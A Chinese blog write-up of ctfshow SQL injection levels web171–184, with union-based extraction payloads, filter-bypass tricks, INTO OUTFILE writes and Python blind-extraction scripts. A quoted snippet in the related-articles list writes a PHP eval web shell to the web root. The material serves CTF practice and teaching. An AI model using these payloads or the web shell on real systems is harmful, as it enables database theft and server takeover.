ctfshow-sql注入

最新推荐文章于 2024-04-30 22:41:15 发布
最新推荐文章于 2024-04-30 22:41:15 发布
阅读量787 收藏 21
点赞数 31
分类专栏: ctf 文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72898152/article/details/136529802
版权

ctfshow-sql注入(一)

文章目录

SQL注入知识普及

判断是否注入

使用注释符–+或者使用%23来做注释符或者使用#

order by 判断列数

order by 是根据某一列进行排序
使用1’ order by 3–+ -> 回显正常

1’ order by 4–+ -> 没有数据 -> 说明列数是3

使用union select 判断回显

union合并查询的特性:

前面查询的语句和后面查询的语句结果互不干扰

前面查询语句的字段数量和后面查询语句的字段数量要一致

information_schema库:

SCHEMATA表:所有数据库信息 schemata_name 保存所有库的的库名信息

TABLES表:所有表信息 table_schema,table_name 查询所有表的名称

COLUMNS表:所有列信息 table_schema,table_name,column_name 所有字段的信息名

SQL注入流程:

判断有无注入点 and 1=1

猜解列名数量 order by 数字

通过报错判断回显点 union

信息收集

使用对应的SQL注入

information_schema.tables 查找表名

限制条件 table_schema=‘security’;

group_concat(table_name) 分组去重

查表名:id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’

查列名:id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’

查字段数据:select username,password from users

union select 1,2,(select group_concat(username,0x3a,password) from users)

0x3a :

web171

方法一:

1' or 1=1--+

方法二:

猜解列名数量:1’ order by 3–+ -> 回显正常 1’ order by 4–+ -> 没有数据 -> 说明列数是3

判断回显点:1’ union select 1,2,3–+ 发现都可以回显

随便选一个回显点查询数据库名:1’ union select 1,database(),3–+ 拿到数据库名是ctfshow_web

进行sql注入

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow_web'--+                #拿到用户表名为ctfshow_user
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user'--+                 #拿到列名为:id,username,password
1' union select 1,group_concat(username,0x3a,password),3 from ctfshow_user--+       拿到flag

在这里插入图片描述

web172

猜解列名数量:1’ order by 2–+ -> 回显正常 1’ order by 3–+ -> 没有数据 -> 说明列数是2

判断回显点:1’ union select 1,2–+ 发现都可以回显

随便选一个回显点查询数据库名:1’ union select 1,database()–+ 拿到数据库名是ctfshow_web

进行sql注入

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+                   #返回ctfshow_user,ctfshow_user2
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2'--+                   #拿到列名为:id,username,password
1' union select 1,group_concat(username,0x3a,password) from ctfshow_user2--+          #拿到flag

在这里插入图片描述

web173

猜解列名数量:1’ order by 3–+ -> 回显正常 1’ order by 4–+ -> 没有数据 -> 说明列数是3

判断回显点:1’ union select 1,2,3–+ 发现都可以回显

随便选一个回显点查询数据库名:1’ union select 1,database(),3–+ 拿到数据库名是ctfshow_web

进行sql注入

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow_web'--+                         #表名为ctfshow_user,ctfshow_user2,ctfshow_user3
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user3'--+                         #id,username,password
因为题目将flag用正则表达式替换,所以我们使用hex()编码进行桡过
1' union select 1,group_concat(hex(username),0x3a,password),3 from ctfshow_user3--+         #拿到flag

在这里插入图片描述

web174

在这里插入图片描述

猜解列名数量:1’ order by 2–+ -> 回显正常 1’ order by 3–+ -> 没有数据 -> 说明列数是2

判断回显点:1’ union select 1,2–+ 发现都可以回显

随便选一个回显点查询数据库名:1’ union select database(),database()–+ 拿到数据库名是ctfshow_web

进行sql注入

-1' union select replace(username,'g','j'),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'g','j') from ctfshow_user4 where username='flag'--+

web175

在这里插入图片描述

过滤了ascii 0-127

把flag直接写入到网站根目录

1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt' --+

web176

无任何过滤

使用万能密码->拿到flag

1' or 1=1--+

在这里插入图片描述

web177

在这里插入图片描述

过滤了空格–+注释符

使用/**/->空格,%23->#(注释符)进行过滤->拿到flag

在这里插入图片描述

web178

过滤了/**/->用%0a,%0b,%0c,%0d,%09都可以表示空格->绕过->拿到flag

1'%0aor%0a1=1%23

在这里插入图片描述

web179

过滤了%0a,%0b,%0d,使用%0c绕过->拿到flag

1'%0cor%0c1=1%23

在这里插入图片描述

web180

过滤了%23,使用--%0c-进行绕过->拿到flag

在这里插入图片描述

web181~web182

同180关

web183

在这里插入图片描述

题目是post传参,tableName=ctfshow_user有回显

在这里插入图片描述

脚本:->拿到flag

import requests
import time
import random

url = 'http://4ffbaf45-c630-4463-a9ad-4d59e4ba8a16.challenge.ctf.show/select-waf.php'

flagstr = '{abcdefghijklmnopqrstuvwxyz-0123456789}'

flag = ''

for i in range(0, 40):
    for x in flagstr:
        data = {
            "tableName": "`ctfshow_user`where`pass`regexp(\"ctfshow{}\")".format(flag + x)
        }
        response = requests.post(url, data=data)
        time.sleep(random.randint(0,1))
        if response.text.find("user_count = 1;") > 0:
            print("{} is right".format(x))
            flag += x
            break
        else:
            print("{} is wrong".format(x))
            continue
    print(flag)

在这里插入图片描述

web184

过滤了where,反引号,单引号,双引号,但是没有过滤空格,所以使用having代替where,用十六进制字符串代替双引号中的内容

脚本:->拿到flag

import requests
import time

url = 'http://ab747f50-6bcd-4a98-b047-721025e886b1.challenge.ctf.show/select-waf.php'

flagstr = '{abcdefghijklmnopqrstuvwxyz-0123456789}'


def str2hex(str):
    a = ""
    for x in str:
        a += hex(ord(x))
    return a.replace("0x", "")


def main():
    flag = ''
    for i in range(0, 40):
        for x in flagstr:
            data = {
                "tableName": "ctfshow_user group by pass having pass regexp(0x63746673686f77{})".format(
                    str2hex(flag + x))
            }
            response = requests.post(url, data=data)
            time.sleep(0.03)
            if response.text.find("user_count = 1;") > 0:
                print("{} is right".format(x))
                flag += x
                break
            else:
                print("{} is wrong".format(x))
                continue
        print(flag)


if __name__ == '__main__':
    main()

在这里插入图片描述

我不是陆神
关注
  • 31
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTFshow sql注入 上篇(web221-253)
Kradress的博客
04-20 4579
目录前言思路题解总结 前言 输入源码 思路 ################################ 题解 ################################ 总结 …
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
ctfshow——SQL注入
最新发布
qq_55202378的博客
04-30 1274
前者恒为真,如果and前面的语句有内容,则正常输出;后者恒为假,如果and前面的语句有内容,也不会输出。故,可以通过他们俩来判断SQL注入类型。查看页面源代码,发现一个js文件。访问该文件,会发现一个查询接口。一种方法是抓取数据包,让sqlmap跑数据包;不知道为啥这里%0c没有被过滤。的时候,需要使前面一条语句错误。伪造referer。这一关开始使用sqlmap。进行报错注入的时候,需要对。(+的url编码)替换。指定 sqlmap 以。参数指定要测试的网址,
CTFSHOW-sql注入
Yb_140的博客
08-13 2440
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
ctfshow_sql注入
qq_45951598的博客
03-14 1404
文章目录WEB172WEB173 WEB172 查询语句 //拼接sql语句查找指定ID用户 sql = “select username,password from ctfshow_user2 where username !=‘flag’ and id = '”.$_GET[‘id’]."’ limit 1;"; 返回逻辑 //检查结果是否有flag if($row->username!==‘flag’){ $ret[‘msg’]=‘查询成功’; } 这里说我们返回的语句中不能包含flag
ctfshow sql注入
weixin_56537388的博客
08-17 80
可以看出有3个字段,采用联合查询的方式,查找数据库,%23代表#号MariaDB是MySQL的分支使用group_concat可以输出多个结果,这里因为只有一个结果,mysql5.0以上的版本有information_schema,可以省下拆解的过程这里跑出列名这里跑出数据,flag为ctfshow{dc5b040b-cb74-479c-9b2f-a6a4e2b84c0f}
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 596
重新来做一遍 争取不看wp。
HDwiki-sql注入1
08-03
标题 "HDwiki-sql注入1" 描述的内容涉及到一个针对HDwiki系统的SQL注入漏洞。这个漏洞出现在PHP代码处理用户输入不当时,导致攻击者能够利用它执行恶意的SQL命令。 首先,我们来看一下问题的关键部分。`array_walk`...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
php登录页面实现-SQL注入
03-07
php登录页面实现-SQL注入
极光-SQL注入
11-08
【极光-SQL注入】是一种常见的网络安全漏洞,主要出现在基于SQL(结构化查询语言)的数据库管理系统中。这种攻击方式允许恶意用户通过在输入数据中嵌入SQL命令,来操纵后台数据库,获取、修改或删除敏感信息。在本文...
WEB ---- ctfshow ----- SQL注入
L0g1c的博客
06-24 418
看题目 //拼接sql语句查找指定ID用户我们能够控制的只有的值,经分析,条件为不为 flag。可是只有用户名为 flag 才能输出 正确的flag。第一步先判断是否有注入点。观察到存在单引号,所以要考虑引号闭合问题。 输入的内容被当作代码执行 逻辑词 or 只要任意一个条件为真就算成立所以输入,可以列出所有的记录(数据)本来抱着测试注入点,不小心把 flag 测出来了,嘻嘻。正规做一下这个题,要想绕过 ,仔细观察得到与 id 使用逻辑运算符 相连,所以使得 id 与一个不存在的数相等,就可以绕过 打开题
CTFSHOW sql注入(一)
qq_51754713的博客
10-04 4863
title: CTFSHOW-sql注入(一) data: 2021-09-15 tags: CTF-web CTFSHOW sql注入(一) 开始一周的高强度sql注入训练,先从ctfshow 的基础开始。 包含了CTFSHOW sql注入的 170-200题。 这里都是sql注入的一些基本知识点。主要是了解sql注入的常见题型。 题目 web 171(万能密码) 万能密码: 1'or 1=1-- - web 172(过滤回显内容) 这里看出有一定的waf,我们并不能在username里面.
CTFshow——SQL注入【Part 1】
D.MIND 的博客
03-10 790
web171—— 2' and 1=1 # 2' or 1=1 # 数据接口请求异常:parsererror 2' or 1=1 -- - 回显正常,且爆出所有信息,说明“-- -”其效果了 。“#”这种注释方式不成功 2' union select 1,2 -- - 数据接口请求异常:parsererror 2' union select 1,2,3 -- - 成功回显1,2,3 2' union select 1,database(),group_concat(table_name) fro
ctf.show的SQL注入(web171-web253)
wanan的博客
09-30 6872
ctf.show的SQL注入(web171-web253)
CTFSHOW SQL注入篇(171-190)
羽的博客
06-07 2390
无过滤 前言 下面几道无过滤的题都可以写入shell 然后蚁剑连上后从数据库里面找,具体做法如下 id=0' union select 1,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 有的是查询的三项所以payload是 id=0' union select 1,2,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 接着
CTFshow——web入门——sql注入
h_adam的博客
03-14 5446
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
ctfshow-SQL注入(web214-web220)
m0_72125469的博客
01-21 1041
web214 web215 web216 web217 web218 web219 web220
ctfshowsql
09-01
ctfshowsql是一个基于Python的工具,用于进行SQL注入攻击。通过使用ctfshowsql工具,可以执行一系列的命令来获取数据库中的信息。这些命令包括使用sqlmap工具进行数据查询,查表和查找列。 引用中的命令是用来查询表中的列。通过指定数据库名称(-D参数)和表名称(-T参数),可以获取指定表的列信息。 引用中的命令是用来查找数据。通过指定数据库名称(-D参数)、表名称(-T参数)和列名称(-C参数),可以获取指定表中指定列的数据。 引用中的命令是用来查询数据库中的表。通过指定数据库名称(-D参数),可以获取该数据库中的所有表。 所以,通过使用ctfshowsql工具的不同命令,可以方便地进行SQL注入攻击,获取数据库中的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [sql注入————ctfshowsql注入](https://blog.csdn.net/qq_45655564/article/details/117663593)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我不是陆神

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值